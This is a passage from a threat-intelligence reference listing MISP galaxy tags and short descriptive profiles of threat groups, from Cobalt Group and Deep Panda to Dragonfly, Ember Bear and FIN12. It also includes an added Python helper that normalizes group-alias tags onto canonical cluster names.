The tag is: misp-galaxy:groups="Cleaver"

GOLD KINGSWOOD - Associated Group

<sup>[[Secureworks GOLD KINGSWOOD September 2018](https://app.tidalcyber.com/references/cda529b2-e152-4ff0-a6b3-d0305b09fef9)]</sup>

The tag is: misp-galaxy:groups="GOLD KINGSWOOD - Associated Group"

Cobalt Gang - Associated Group

<sup>[[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)]</sup> <sup>[[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)]</sup><sup>[[Morphisec Cobalt Gang Oct 2018](https://app.tidalcyber.com/references/0a0bdd4b-a680-4a38-967d-3ad92f04d619)]</sup>

The tag is: misp-galaxy:groups="Cobalt Gang - Associated Group"

Cobalt Spider - Associated Group

<sup>[[Crowdstrike Global Threat Report Feb 2018](https://app.tidalcyber.com/references/6c1ace5b-66b2-4c56-9301-822aad2c3c16)]</sup>

The tag is: misp-galaxy:groups="Cobalt Spider - Associated Group"

Cobalt Group

[Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money by targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.<sup>[[Talos Cobalt Group July 2018](https://app.tidalcyber.com/references/7cdfd0d1-f7e6-4625-91ff-f87f46f95864)]</sup><sup>[[PTSecurity Cobalt Group Aug 2017](https://app.tidalcyber.com/references/f4ce1b4d-4f01-4083-8bc6-931cbac9ac38)]</sup><sup>[[PTSecurity Cobalt Dec 2016](https://app.tidalcyber.com/references/2de4d38f-c99d-4149-89e6-0349a4902aa2)]</sup><sup>[[Group IB Cobalt Aug 2017](https://app.tidalcyber.com/references/2d9ef1de-2ee6-4500-a87d-b55f83e65900)]</sup><sup>[[Proofpoint Cobalt June 2017](https://app.tidalcyber.com/references/c4922659-88b2-4311-9c9b-dc9b383d746a)]</sup><sup>[[RiskIQ Cobalt Nov 2017](https://app.tidalcyber.com/references/ebf961c5-bd68-42f3-8fd3-000946c7ae9c)]</sup><sup>[[RiskIQ Cobalt Jan 2018](https://app.tidalcyber.com/references/7d48b679-d44d-466e-b12b-16f0f9858d15)]</sup> Reporting indicates there may be links between [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) and both the malware [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) and the group Carbanak.<sup>[[Europol Cobalt Mar 2018](https://app.tidalcyber.com/references/f9d1f2ab-9e75-48ce-bcdf-b7119687feef)]</sup>

The tag is: misp-galaxy:groups="Cobalt Group"

Confucius APT - Associated Group

The tag is: misp-galaxy:groups="Confucius APT - Associated Group"

Confucius

[Confucius](https://app.tidalcyber.com/groups/d0f29889-7a9c-44d8-abdc-480b371f7b2b) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://app.tidalcyber.com/groups/d0f29889-7a9c-44d8-abdc-480b371f7b2b) and [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a), particularly in their respective custom malware code and targets.<sup>[[TrendMicro Confucius APT Feb 2018](https://app.tidalcyber.com/references/d1d5a708-75cb-4d41-b2a3-d035a14ac956)]</sup><sup>[[TrendMicro Confucius APT Aug 2021](https://app.tidalcyber.com/references/5c16aae9-d253-463b-8bbc-f14402ce77e4)]</sup><sup>[[Uptycs Confucius APT Jan 2021](https://app.tidalcyber.com/references/d74f2c25-cd53-4587-b087-7ba0b8427dc4)]</sup>

The tag is: misp-galaxy:groups="Confucius"

CopyKittens

[CopyKittens](https://app.tidalcyber.com/groups/6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.<sup>[[ClearSky CopyKittens March 2017](https://app.tidalcyber.com/references/f5a42615-0e4e-4d43-937d-05d2efe636cf)]</sup><sup>[[ClearSky Wilted Tulip July 2017](https://app.tidalcyber.com/references/50233005-8dc4-4e91-9477-df574271df40)]</sup><sup>[[CopyKittens Nov 2015](https://app.tidalcyber.com/references/04e3ce40-5487-4931-98db-f55da83f412e)]</sup>

The tag is: misp-galaxy:groups="CopyKittens"

CURIUM

[CURIUM](https://app.tidalcyber.com/groups/ab15a328-c41e-5701-993f-3cab29ac4544) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://app.tidalcyber.com/groups/ab15a328-c41e-5701-993f-3cab29ac4544) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.<sup>[[Microsoft Iranian Threat Actor Trends November 2021](https://app.tidalcyber.com/references/78d39ee7-1cd5-5cb8-844a-1c3649e367a1)]</sup>

The tag is: misp-galaxy:groups="CURIUM"

CyberAv3ngers

CyberAv3ngers is a cyber actor group that has claimed responsibility for numerous disruption-focused attacks against critical infrastructure organizations, including an oil refinery and electric utility in Israel and water/wastewater utilities in the United States. According to a joint advisory released by U.S. & Israeli cybersecurity authorities in December 2023, CyberAv3ngers (aka Cyber Av3ngers or Cyber Avengers) is a “cyber persona” of advanced persistent threat actors affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC). The advisory detailed how suspected CyberAv3ngers actors compromised programmable logic controller (PLC) devices that were exposed to the internet and used the vendor’s default passwords and ports, leaving defacement images and possibly rendering the devices inoperable. The defacement messages suggested that the group or affiliates might carry out attacks against other technological equipment produced in or associated with Israel.<sup>[[U.S. CISA IRGC-Affiliated PLC Activity December 2023](/references/51a18523-5276-4a67-8644-2bc6997d043c)]</sup>

The tag is: misp-galaxy:groups="CyberAv3ngers"

Daixin Team

Daixin Team is a ransomware- and data extortion-focused threat group first observed in mid-2022. Daixin Team is known to publicly extort its victims to pressure them into paying a ransom. It has used ransomware (believed to be based on the leaked source code for Babuk Locker) to encrypt victim data and has also exfiltrated sensitive data from victim environments and threatened to publicly leak that data.

Many of Daixin Team’s victims belong to critical infrastructure sectors, especially the Healthcare and Public Health (“HPH”) sector. An October 2022 joint Cybersecurity Advisory noted Daixin Team attacks on multiple U.S. HPH organizations.<sup>[[U.S. CISA Daixin Team October 2022](/references/cbf5ecfb-de79-41cc-8250-01790ff6e89b)]</sup> Alleged victims referenced on the threat group’s extortion website belong to the healthcare, utilities, transportation (airline), automobile manufacturing, information technology, retail, and media sectors in the United States, Europe, and Asia.<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup>

The tag is: misp-galaxy:groups="Daixin Team"

Dark Caracal

[Dark Caracal](https://app.tidalcyber.com/groups/7ad94dbf-9909-42dd-8b62-a435481bdb14) is a threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. <sup>[[Lookout Dark Caracal Jan 2018](https://app.tidalcyber.com/references/c558f5db-a426-4041-b883-995ec56e7155)]</sup>

The tag is: misp-galaxy:groups="Dark Caracal"

DUBNIUM - Associated Group

The tag is: misp-galaxy:groups="DUBNIUM - Associated Group"

Darkhotel

[Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group’s name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.<sup>[[Kaspersky Darkhotel](https://app.tidalcyber.com/references/3247c03a-a57c-4945-9b85-72a70719e1cd)]</sup><sup>[[Securelist Darkhotel Aug 2015](https://app.tidalcyber.com/references/5a45be49-f5f1-4d5b-b7da-0a2f38194ec1)]</sup><sup>[[Microsoft Digital Defense FY20 Sept 2020](https://app.tidalcyber.com/references/cdf74af5-ed71-4dfd-bc49-0ccfa40b65ea)]</sup>

The tag is: misp-galaxy:groups="Darkhotel"

DarkHydrus

[DarkHydrus](https://app.tidalcyber.com/groups/f2b31240-0b4a-4fa4-82a4-6bb00e146e75) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. <sup>[[Unit 42 DarkHydrus July 2018](https://app.tidalcyber.com/references/800279cf-e6f8-4721-818f-46e35ec7892a)]</sup> <sup>[[Unit 42 Playbook Dec 2017](https://app.tidalcyber.com/references/9923f9ff-a7b8-4058-8213-3c83c54c10a6)]</sup>

The tag is: misp-galaxy:groups="DarkHydrus"

DarkVishnya

[DarkVishnya](https://app.tidalcyber.com/groups/d428f9be-6faf-4d57-b677-4a927fea5f7e) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.<sup>[[Securelist DarkVishnya Dec 2018](https://app.tidalcyber.com/references/da9ac5a7-c644-45fa-ab96-30ac6bfc9f81)]</sup>

The tag is: misp-galaxy:groups="DarkVishnya"

WebMasters - Associated Group

The tag is: misp-galaxy:groups="WebMasters - Associated Group"

PinkPanther - Associated Group

The tag is: misp-galaxy:groups="PinkPanther - Associated Group"

Shell Crew - Associated Group

The tag is: misp-galaxy:groups="Shell Crew - Associated Group"

KungFu Kittens - Associated Group

The tag is: misp-galaxy:groups="KungFu Kittens - Associated Group"

Black Vine - Associated Group

The tag is: misp-galaxy:groups="Black Vine - Associated Group"

Deep Panda

[Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. <sup>[[Alperovitch 2014](https://app.tidalcyber.com/references/72e19be9-35dd-4199-bc07-bd9d0c664df6)]</sup> The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b). <sup>[[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)]</sup> This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. <sup>[[RSA Shell Crew](https://app.tidalcyber.com/references/6872a6d3-c4ab-40cf-82b7-5c5c8e077189)]</sup> [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. <sup>[[Symantec Black Vine](https://app.tidalcyber.com/references/0b7745ce-04c0-41d9-a440-df9084a45d09)]</sup> Some analysts track [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) and [APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) as the same group, but it is unclear from open source information if the groups are the same. <sup>[[ICIT China’s Espionage Jul 2016](https://app.tidalcyber.com/references/1a824860-6978-454d-963a-a56414a4312b)]</sup>

The tag is: misp-galaxy:groups="Deep Panda"

Berserk Bear - Associated Group

<sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup><sup>[[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)]</sup><sup>[[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]</sup>

The tag is: misp-galaxy:groups="Berserk Bear - Associated Group"

Crouching Yeti - Associated Group

<sup>[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)]</sup><sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup><sup>[[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)]</sup><sup>[[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]</sup>

The tag is: misp-galaxy:groups="Crouching Yeti - Associated Group"

Energetic Bear - Associated Group

<sup>[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)]</sup><sup>[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)]</sup><sup>[[Secureworks MCMD July 2019](https://app.tidalcyber.com/references/f7364cfc-5a3b-4538-80d0-cae65f3c6592)]</sup><sup>[[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)]</sup><sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup><sup>[[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)]</sup><sup>[[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]</sup>

The tag is: misp-galaxy:groups="Energetic Bear - Associated Group"

TEMP.Isotope - Associated Group

<sup>[[Mandiant Ukraine Cyber Threats January 2022](https://app.tidalcyber.com/references/6f53117f-2e94-4981-be61-c3da4b783ce2)]</sup><sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup>

The tag is: misp-galaxy:groups="TEMP.Isotope - Associated Group"

DYMALLOY - Associated Group

The tag is: misp-galaxy:groups="DYMALLOY - Associated Group"

TG-4192 - Associated Group

<sup>[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)]</sup><sup>[[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]</sup>

The tag is: misp-galaxy:groups="TG-4192 - Associated Group"

IRON LIBERTY - Associated Group

The tag is: misp-galaxy:groups="IRON LIBERTY - Associated Group"

Dragonfly

[Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) is a cyber espionage group that has been attributed to Russia’s Federal Security Service (FSB) Center 16.<sup>[[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)]</sup><sup>[[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]</sup> Active since at least 2010, [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.<sup>[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)]</sup><sup>[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)]</sup><sup>[[Symantec Dragonfly Sept 2017](https://app.tidalcyber.com/references/11bbeafc-ed5d-4d2b-9795-a0a9544fb64e)]</sup><sup>[[Fortune Dragonfly 2.0 Sept 2017](https://app.tidalcyber.com/references/b56c5b41-b8e0-4fef-a6d8-183bb283dc7c)]</sup><sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup><sup>[[CISA AA20-296A Berserk Bear December 2020](https://app.tidalcyber.com/references/c7bc4b25-2043-4f43-8320-590f82d0e09a)]</sup><sup>[[Symantec Dragonfly 2.0 October 2017](https://app.tidalcyber.com/references/a0439d4a-a3ea-4be5-9a01-f223ca259681)]</sup>

The tag is: misp-galaxy:groups="Dragonfly"
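The entries above show the tag form this galaxy uses (`misp-galaxy:groups="<cluster>"`) and list each alias as its own "... - Associated Group" entry ahead of the canonical cluster (Shell Crew, WebMasters, KungFu Kittens, PinkPanther and Black Vine for Deep Panda; Berserk Bear, Crouching Yeti, Energetic Bear, TEMP.Isotope, DYMALLOY, TG-4192 and IRON LIBERTY for Dragonfly). When feeds from several sources tag the same intrusion set under different names, an analyst usually wants to collapse them onto one canonical tag before correlating. The following is an added example, not code from the MISP project or from this galaxy's JSON: it parses the tag syntax, strips the "Associated Group" suffix this rendering appends, and maps aliases to the canonical cluster. The `SYNONYMS` table is constructed by hand from the two entries above; a real tool would read `meta.synonyms` from the galaxy JSON instead.

```python
import re
from typing import Optional

# Tag grammar as printed on this page: misp-galaxy:<galaxy-type>="<cluster value>"
# Galaxy types are lower-case identifiers; the value may contain spaces but not quotes.
TAG_RE = re.compile(r'^misp-galaxy:(?P<galaxy>[a-z0-9-]+)="(?P<value>[^"]+)"$')

# Suffix this rendering appends to alias entries ("Shell Crew - Associated Group").
ASSOCIATED_SUFFIX = " - Associated Group"

# Constructed synonym table (canonical cluster -> aliases) taken from the Deep Panda
# and Dragonfly entries on this page. Assumption: in production this would be built
# from meta.synonyms in the galaxy JSON, not typed in.
SYNONYMS = {
    "Deep Panda": ["Shell Crew", "WebMasters", "KungFu Kittens", "PinkPanther", "Black Vine"],
    "Dragonfly": ["Berserk Bear", "Crouching Yeti", "Energetic Bear", "TEMP.Isotope",
                  "DYMALLOY", "TG-4192", "IRON LIBERTY"],
}

# Case-folded lookup so "energetic bear" and "Energetic Bear" resolve identically.
_ALIAS_INDEX = {canon.casefold(): canon for canon in SYNONYMS}
for _canon, _aliases in SYNONYMS.items():
    for _alias in _aliases:
        _ALIAS_INDEX[_alias.casefold()] = _canon


def parse_tag(tag: str) -> Optional[tuple[str, str]]:
    """Split a misp-galaxy tag into (galaxy type, cluster value); None if malformed."""
    m = TAG_RE.match(tag.strip())
    if m is None:
        return None
    return m.group("galaxy"), m.group("value")


def canonical_name(value: str) -> str:
    """Drop the 'Associated Group' suffix and resolve a known alias to its canonical cluster."""
    name = value[:-len(ASSOCIATED_SUFFIX)] if value.endswith(ASSOCIATED_SUFFIX) else value
    name = name.strip()
    return _ALIAS_INDEX.get(name.casefold(), name)


def normalize_tag(tag: str) -> Optional[str]:
    """Rewrite a tag onto its canonical cluster; None if the tag does not parse."""
    parsed = parse_tag(tag)
    if parsed is None:
        return None
    galaxy, value = parsed
    return f'misp-galaxy:{galaxy}="{canonical_name(value)}"'


if __name__ == "__main__":
    for t in ('misp-galaxy:groups="Shell Crew - Associated Group"',
              'misp-galaxy:groups="energetic bear"',
              'misp-galaxy:groups=Deep Panda'):
        print(t, "->", normalize_tag(t))
```

Unknown clusters pass through unchanged rather than being rejected, so a tag from a galaxy version newer than the synonym table still survives; a malformed tag (missing quotes, wrong prefix) returns None so the caller can log it instead of silently storing a string that MISP would never match.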

DragonOK

[DragonOK](https://app.tidalcyber.com/groups/f2c2db08-624c-46b9-b7ed-b22c21b81813) is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, [DragonOK](https://app.tidalcyber.com/groups/f2c2db08-624c-46b9-b7ed-b22c21b81813) is thought to have a direct or indirect relationship with the threat group [Moafee](https://app.tidalcyber.com/groups/4510ce41-27b9-479c-9bf3-a328b77bae29). <sup>[[Operation Quantum Entanglement](https://app.tidalcyber.com/references/c94f9652-32c3-4975-a9c0-48f93bdfe790)]</sup> It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. <sup>[[New DragonOK](https://app.tidalcyber.com/references/82c1ed0d-a41d-4212-a3ae-a1d661bede2d)]</sup>

The tag is: misp-galaxy:groups="DragonOK"

TAG-22 - Associated Group

<sup>[[Recorded Future TAG-22 July 2021](https://app.tidalcyber.com/references/258433e7-f829-4365-adbb-c5690159070f)]</sup>

The tag is: misp-galaxy:groups="TAG-22 - Associated Group"

Earth Lusca

[Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) operations may be financially motivated.<sup>[[TrendMicro EarthLusca 2022](https://app.tidalcyber.com/references/f6e1bffd-e35b-4eae-b9bf-c16a82bf7004)]</sup>

[Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) has used malware commonly used by other Chinese threat groups, including [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) and the [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) cluster, however security researchers assess [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e)'s techniques and infrastructure are separate.<sup>[[TrendMicro EarthLusca 2022](https://app.tidalcyber.com/references/f6e1bffd-e35b-4eae-b9bf-c16a82bf7004)]</sup>

The tag is: misp-galaxy:groups="Earth Lusca"

Elderwood Gang - Associated Group

The tag is: misp-galaxy:groups="Elderwood Gang - Associated Group"

Beijing Group - Associated Group

The tag is: misp-galaxy:groups="Beijing Group - Associated Group"

Sneaky Panda - Associated Group

The tag is: misp-galaxy:groups="Sneaky Panda - Associated Group"

Elderwood

[Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. <sup>[[Security Affairs Elderwood Sept 2012](https://app.tidalcyber.com/references/ebfc56c5-0490-4b91-b49f-548c00a59162)]</sup> The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. <sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup> <sup>[[CSM Elderwood Sept 2012](https://app.tidalcyber.com/references/6b79006d-f6de-489c-82fa-8c3c28d652ef)]</sup>

The tag is: misp-galaxy:groups="Elderwood"

Saint Bear - Associated Group

<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup>

The tag is: misp-galaxy:groups="Saint Bear - Associated Group"

Lorec53 - Associated Group

<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup>

The tag is: misp-galaxy:groups="Lorec53 - Associated Group"

UNC2589 - Associated Group

The tag is: misp-galaxy:groups="UNC2589 - Associated Group"

UAC-0056 - Associated Group

<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup>

The tag is: misp-galaxy:groups="UAC-0056 - Associated Group"

Lorec Bear - Associated Group

<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup>

The tag is: misp-galaxy:groups="Lorec Bear - Associated Group"

Bleeding Bear - Associated Group

<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup>

The tag is: misp-galaxy:groups="Bleeding Bear - Associated Group"

Ember Bear

[Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) has primarily focused their operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) likely conducted the [WhisperGate](https://app.tidalcyber.com/software/791f0afd-c2c4-4e23-8aee-1d14462667f5) destructive wiper attacks against Ukraine in early 2022.<sup>[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]</sup><sup>[[Mandiant UNC2589 March 2022](https://app.tidalcyber.com/references/63d89139-9dd4-4ed6-bf6e-8cd872c5d034)]</sup><sup>[[Palo Alto Unit 42 OutSteel SaintBot February 2022](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)]</sup>

The tag is: misp-galaxy:groups="Ember Bear"

Equation

[Equation](https://app.tidalcyber.com/groups/a4704485-65b5-49ec-bebe-5cc932362dd2) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. <sup>[[Kaspersky Equation QA](https://app.tidalcyber.com/references/34674802-fbd9-4cdb-8611-c58665c430e5)]</sup>

The tag is: misp-galaxy:groups="Equation"

Evilnum

[Evilnum](https://app.tidalcyber.com/groups/4bdc62c9-af6a-4377-8431-58a6f39235dd) is a financially motivated threat group that has been active since at least 2018.<sup>[[ESET EvilNum July 2020](https://app.tidalcyber.com/references/6851b3f9-0239-40fc-ba44-34a775e9bd4e)]</sup>

The tag is: misp-galaxy:groups="Evilnum"

EXOTIC LILY

[EXOTIC LILY](https://app.tidalcyber.com/groups/396a4361-3e84-47bc-9544-58e287c05799) is a financially motivated group that has been closely linked with [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) and the deployment of ransomware including [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) and [Diavol](https://app.tidalcyber.com/software/d057b6e7-1de4-4f2f-b374-7e879caecd67). [EXOTIC LILY](https://app.tidalcyber.com/groups/396a4361-3e84-47bc-9544-58e287c05799) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.<sup>[[Google EXOTIC LILY March 2022](https://app.tidalcyber.com/references/19d2cb48-bdb2-41fe-ba24-0769d7bd4d94)]</sup>

The tag is: misp-galaxy:groups="EXOTIC LILY"

Ferocious Kitten

[Ferocious Kitten](https://app.tidalcyber.com/groups/275ca7b0-3b21-4c3a-8b6f-57b6f0ffb6fb) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.<sup>[[Kaspersky Ferocious Kitten Jun 2021](https://app.tidalcyber.com/references/b8f8020d-3f5c-4b5e-8761-6ecdd63fcd50)]</sup>

The tag is: misp-galaxy:groups="Ferocious Kitten"

FIN10

[FIN10](https://app.tidalcyber.com/groups/345e553a-164d-4c9d-8bf9-19fcf8a51533) is a financially motivated threat group that targeted organizations in North America from at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. <sup>[[FireEye FIN10 June 2017](https://app.tidalcyber.com/references/9d5c3956-7169-48d5-b4d0-f7a56a742adf)]</sup>

The tag is: misp-galaxy:groups="FIN10"

Pistachio Tempest - Associated Group

<sup>[[CERTFR-2023-CTI-007](https://app.tidalcyber.com/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

The tag is: misp-galaxy:groups="Pistachio Tempest - Associated Group"

FIN12

FIN12 is a financially motivated threat actor group believed to be responsible for multiple high-profile ransomware attacks since 2018. The group has attacked victims in various sectors and locations, including multiple attacks on healthcare entities. An October 2021 Mandiant assessment indicated 85% of the group’s victims were U.S.-based, and the large majority of them were large enterprises with more than $300 million in annual revenue. The report also assessed that initial access brokers partnering with FIN12 target a wider range of organizations and allow FIN12 actors to select victims for further malicious activity.<sup>[[Mandiant FIN12 Group Profile October 07 2021](https://app.tidalcyber.com/references/7af84b3d-bbd6-449f-b29b-2f14591c9f05)]</sup>

FIN12’s toolset has reportedly shifted over time. Cobalt Strike has been observed in most intrusions. While TrickBot and Empire were common post-exploitation tools historically, French authorities observed the group using SystemBC alongside Cobalt Strike during a March 2023 hospital center intrusion. Ryuk, and to a lesser degree Conti, were the ransomware payloads traditionally used, with Ryuk deployed in a series of attacks on U.S. healthcare entities in 2020. However, a French CERT assessment published in 2023 linked the group to multiple more recent incidents it investigated and analyzed, which featured deployment of various ransomware families, including Hive, Nokoyawa, Play, Royal, and BlackCat, along with Emotet and BazarLoader malware for initial footholds.<sup>[[Mandiant FIN12 Group Profile October 07 2021](https://app.tidalcyber.com/references/7af84b3d-bbd6-449f-b29b-2f14591c9f05)]</sup><sup>[[CERTFR-2023-CTI-007](https://app.tidalcyber.com/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

Related Vulnerabilities: CVE-2023-21746, CVE-2022-24521, CVE-2021-34527, CVE-2019-0708, CVE-2020-1472<sup>[[CERTFR-2023-CTI-007](https://app.tidalcyber.com/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

The tag is: misp-galaxy:groups="FIN12"

Elephant Beetle - Associated Group

